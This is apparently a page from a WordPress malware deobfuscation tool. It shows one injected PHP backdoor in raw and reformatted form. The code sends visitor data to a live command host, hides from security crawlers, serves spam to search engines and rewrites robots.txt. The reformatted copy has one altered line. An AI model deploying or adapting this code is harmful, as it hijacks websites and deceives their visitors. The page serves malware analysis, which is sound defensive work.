Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php
error_reporting(0);function getrealIp(){if (getenv('HTTP_CLIENT_IP')) {$ip = getenv('HTTP_CLIENT_IP');}if (getenv('HTTP_X_REAL_IP')) {$ip = getenv('HTTP_X_REAL_IP');} elseif (getenv('HTTP_X_FORWARDED_FOR')) {$ip = getenv('HTTP_X_FORWARDED_FOR');$ips = explode(',', $ip);$ip = $ips[0];} elseif (getenv('REMOTE_ADDR')) {$ip = getenv('REMOTE_ADDR');} else {$ip = '0.0.0.0';}return $ip;}function get_url($url){$remoteContent = @file_get_contents($url);if(empty($remoteContent)){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);if(strpos($url,"https://") !== false){curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);}$remoteContent = curl_exec($ch);curl_close($ch);}return $remoteContent;}if(preg_match("/(Bytespider|PetalBot|AhrefsBot|Barkrowler|MJ12bot|FeedDemon|JikeSpider|Indy Library|AskTbFXTV|CrawlDaddy|CoolpadWebkit|Java|Feedly|UniversalFeedParser|ApacheBench|Swiftbot|ZmEu|oBot|jaunty|Python-urllib|python-requests|lightDeckReports Bot|YYSpider|DigExt|YisouSpider|HttpClient|heritrix|EasouSpider|Ezooms|AmazonBot|SEMrushBot|YandexBot|paloaltonetworks|Python)/i", $_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 403 Forbidden');exit();}$botagent = "bing|google|yahoo";$datacenter = "http://cw375.alivewant.shop/index.php";$pc = "VgEAVQt";$useragent = urlencode($_SERVER['HTTP_USER_AGENT']);$refer = urlencode($_SERVER['HTTP_REFERER']);$language = urlencode($_SERVER['HTTP_ACCEPT_LANGUAGE']);$realip = getrealIp();$ip = urlencode($realip);$domain = urlencode($_SERVER['HTTP_HOST']);$script = urlencode($_SERVER['SCRIPT_NAME']);if ( (! empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (! empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (! empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') ) {$_SERVER['REQUEST_SCHEME'] = 'https';} else {$_SERVER['REQUEST_SCHEME'] = 'http';}$http = urlencode($_SERVER['REQUEST_SCHEME']);$uri = urlencode($_SERVER['REQUEST_URI']);if(strpos($uri,"uuuuxxxxooo") !== false){echo "ok";exit();}if($realip == "153.246.135.238" || $realip == "219.101.44.233"){header('HTTP/1.0 403 Forbidden');exit();}$rewriteable = 0;if(!file_exists("uxo.txt")){$uuu = $http.'://'.$_SERVER['HTTP_HOST'].'/uuuuxxxxooo';$dd = get_url($uuu);if($dd == "ok"){$rewriteable = 1;@file_put_contents("uxo.txt","1");}else{$rewriteable = 0;@file_put_contents("uxo.txt","0");}}else{$rewriteable = @file_get_contents("uxo.txt");}if(strpos($uri,"pingsitemap.xml") !== false){$scripname = $_SERVER['SCRIPT_NAME'];if( strpos( $scripname, "index.php") !== false){if($rewriteable == 0){$scripname = '/?';}else{$scripname = '/';}}else{$scripname = $scripname.'?';}$robots_contents = "User-agent: *\r\nAllow: /";$sitemap = "$http://" . $domain .$scripname. "sitemap.xml";$robots_contents = trim($robots_contents)."\r\n"."Sitemap: $sitemap";$sitemapstatus = "";echo $sitemap.": ".$sitemapstatus.'<br/>';$requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable&script=$script&sitemap=".urlencode($sitemap);$dd = get_url($requsturl); @file_put_contents("robots.txt",$robots_contents);exit();}else if(strpos($uri,"favicon.ico") !== false){}else if(strpos($uri,"jp2023") !== false){$requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable&script=$script";$dd = get_url($requsturl);echo $dd;exit();return;}else if(strpos($uri,"robots.txt") !== false || strpos($uri,"writerobots") !== false){$requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable&script=$script";header('Content-Type: text/plain; charset=utf-8');echo $dd = get_url($requsturl);@file_put_contents("robots.txt",$dd);exit();}else if(preg_match("@^/(.*?).xml$@i", $_SERVER['REQUEST_URI'])){$requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable&script=$script";$dd = get_url($requsturl);if($dd == "500"){header("HTTP/1.0 500 Internal Server Error");exit();}else{header('Content-Type: text/xml; charset=utf-8');echo $dd;exit();return;}}else if(preg_match("/($botagent)/i", $_SERVER['HTTP_USER_AGENT'])){$requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable&script=$script";$dd = get_url($requsturl);if(!empty($dd)){if($dd == "500"){header("HTTP/1.0 500 Internal Server Error");exit();}if(substr($dd,0,5)=="<?xml"){header('Content-Type: text/xml; charset=utf-8');}else{header('Content-Type: text/html; charset=utf-8');}echo $dd;exit();return;}}else if(preg_match("/($botagent)/i", $_SERVER['HTTP_REFERER'])){$requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable";$dd = get_url($requsturl);if($dd == "500"){header("HTTP/1.0 500 Internal Server Error");exit();}else if(!empty($dd)){header('HTTP/1.1 404 Not Found');echo $dd;exit();return;}}else{}
?><?php
error_reporting(0);
function getrealIp()
{
if (getenv('HTTP_CLIENT_IP')) {
$ip = getenv('HTTP_CLIENT_IP');
}
if (getenv('HTTP_X_REAL_IP')) {
$ip = getenv('HTTP_X_REAL_IP');
} elseif (getenv('HTTP_X_FORWARDED_FOR')) {
$ip = getenv('HTTP_X_FORWARDED_FOR');
$ips = explode(',', $ip);
$ip = $ips[0];
} elseif (getenv('REMOTE_ADDR')) {
$ip = getenv('REMOTE_ADDR');
} else {
$ip = '0.0.0.0';
}
return $ip;
}
function get_url($url)
{
$remoteContent = @file_get_contents($url);
if (empty($remoteContent)) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
if (strpos($url, "https://") !== false) {
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
}
$remoteContent = curl_exec($ch);
curl_close($ch);
}
return $remoteContent;
}
if (preg_match("/(Bytespider|PetalBot|AhrefsBot|Barkrowler|MJ12bot|FeedDemon|JikeSpider|Indy Library|AskTbFXTV|CrawlDaddy|CoolpadWebkit|Java|Feedly|UniversalFeedParser|ApacheBench|Swiftbot|ZmEu|oBot|jaunty|Python-urllib|python-requests|lightDeckReports Bot|YYSpider|DigExt|YisouSpider|HttpClient|heritrix|EasouSpider|Ezooms|AmazonBot|SEMrushBot|YandexBot|paloaltonetworks|Python)/i", $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 403 Forbidden');
exit;
}
$botagent = "bing|google|yahoo";
$datacenter = "http://cw375.alivewant.shop/index.php";
$pc = "VgEAVQt";
$useragent = urlencode($_SERVER['HTTP_USER_AGENT']);
$refer = urlencode($_SERVER['HTTP_REFERER']);
$language = urlencode($_SERVER['HTTP_ACCEPT_LANGUAGE']);
$realip = getrealIp();
$ip = urlencode($realip);
$domain = urlencode($_SERVER['HTTP_HOST']);
$script = urlencode($_SERVER['SCRIPT_NAME']);
if (!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https' || !empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on' || !empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443' || isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') {
$_SERVER['REQUEST_SCHEME'] = 'https';
} else {
$_SERVER['REQUEST_SCHEME'] = 'http';
}
$http = urlencode($_SERVER['REQUEST_SCHEME']);
$uri = urlencode($_SERVER['REQUEST_URI']);
if (strpos($uri, "uuuuxxxxooo") !== false) {
echo "ok";
exit;
}
if ($realip == "153.246.135.238" || $realip == "219.101.44.233") {
header('HTTP/1.0 403 Forbidden');
exit;
}
$rewriteable = 0;
if (!file_exists("uxo.txt")) {
$uuu = $http . '://' . $_SERVER['HTTP_HOST'] . '/uuuuxxxxooo';
$dd = get_url($uuu);
if ($dd == "ok") {
$rewriteable = 1;
@file_put_contents("uxo.txt", "1");
} else {
$rewriteable = 0;
@file_put_contents("uxo.txt", "0");
}
} else {
$rewriteable = @file_get_contents("uxo.txt");
}
if (strpos($uri, "pingsitemap.xml") !== false) {
$scripname = $_SERVER['SCRIPT_NAME'];
if (strpos($scripname, "index.php") !== false) {
if ($rewriteable == 0) {
$scripname = '/?';
} else {
$scripname = '/';
}
} else {
$scripname .= '?';
}
$robots_contents = "User-agent: *\r\nAllow: /";
$sitemap = "{$http}://" . $domain . $scripname . "sitemap.xml";
$robots_contents = trim($robots_contents) . "\r\n" . "Sitemap: {$sitemap}";
$sitemapstatus = "";
echo $sitemap . ": " . $sitemapstatus . '<br/>';
$requsturl = $datacenter . "?agent={$useragent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$rewriteable}&script={$script}&sitemap=" . urlencode($sitemap);
$dd = get_url($requsturl);
@file_put_contents("robots.txt", $robots_contents);
exit;
} else {
if (strpos($uri, "favicon.ico") !== false) {
} else {
if (strpos($uri, "jp2023") !== false) {
$requsturl = $datacenter . "?agent={$useragent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$rewriteable}&script={$script}";
$dd = get_url($requsturl);
echo $dd;
exit;
} else {
if (strpos($uri, "robots.txt") !== false || strpos($uri, "writerobots") !== false) {
$requsturl = $datacenter . "?agent={$useragent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$rewriteable}&script={$script}";
header('Content-Type: text/plain; charset=utf-8');
echo $dd = get_url($requsturl);
@file_put_contents("robots.txt", $dd);
exit;
} else {
if (preg_match("@^/(.*?).xml\$@i", $_SERVER['REQUEST_URI'])) {
$requsturl = $datacenter . "?agent={$useragent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$rewriteable}&script={$script}";
$dd = get_url($requsturl);
if ($dd == "500") {
header("HTTP/1.0 500 Internal Server Error");
exit;
} else {
header('Content-Type: text/xml; charset=utf-8');
echo $dd;
exit;
}
} else {
if (preg_match("/({$botagent})/i", $_SERVER['HTTP_USER_AGENT'])) {
$requsturl = $datacenter . "?agent={$useragent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$rewriteable}&script={$script}";
$dd = get_url($requsturl);
if (!empty($dd)) {
if ($dd == "500") {
header("HTTP/1.0 500 Internal Server Error");
exit;
}
if (substr($dd, 0, 5) == "<?php xml") {
header('Content-Type: text/xml; charset=utf-8');
} else {
header('Content-Type: text/html; charset=utf-8');
}
echo $dd;
exit;
}
} else {
if (preg_match("/({$botagent})/i", $_SERVER['HTTP_REFERER'])) {
$requsturl = $datacenter . "?agent={$useragent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$rewriteable}";
$dd = get_url($requsturl);
if ($dd == "500") {
header("HTTP/1.0 500 Internal Server Error");
exit;
} else {
if (!empty($dd)) {
header('HTTP/1.1 404 Not Found');
echo $dd;
exit;
}
}
} else {
}
}
}
}
}
}
}Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.